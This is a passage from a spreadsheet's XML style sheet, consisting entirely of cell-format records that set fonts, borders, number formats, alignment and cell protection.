    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="9" fontId="9" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="88" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="22" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="23" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="17" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="12" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="11" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="18" fillId="0" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="18" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="11" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1" fontId="17" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1" fontId="17" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="178" fontId="17" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1" fontId="11" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="178" fontId="18" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="17" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="17" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="11" fillId="0" borderId="7" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="18" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="20" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="4" fontId="17" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="26" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="26" fillId="0" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="26" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="26" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1" fontId="17" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1" fontId="17" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1" fontId="18" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="17" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="18" fillId="0" borderId="7" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="17" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="20" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="20" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="30" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="31" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="12" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="24" fillId="0" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="25" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="11" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="179" fontId="17" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="17" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="17" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="17" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="179" fontId="17" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="18" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="18" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="18" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="18" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="18" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="17" fillId="0" borderId="9" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" xfId="46" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="0" xfId="63" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="12" fillId="0" borderId="0" xfId="46" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="46" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="46" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="0" xfId="46" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="4" xfId="63" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="1" xfId="63" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="9" xfId="63" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="37" fillId="0" borderId="10" xfId="63" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="9" xfId="63" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="0" borderId="9" xfId="63" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="39" fillId="0" borderId="10" xfId="63" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="9" xfId="63" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="0" borderId="7" xfId="63" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="39" fillId="0" borderId="5" xfId="63" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="0" borderId="7" xfId="63" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="0" borderId="6" xfId="63" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="46" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="176" fontId="12" fillId="0" borderId="0" xfId="46" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
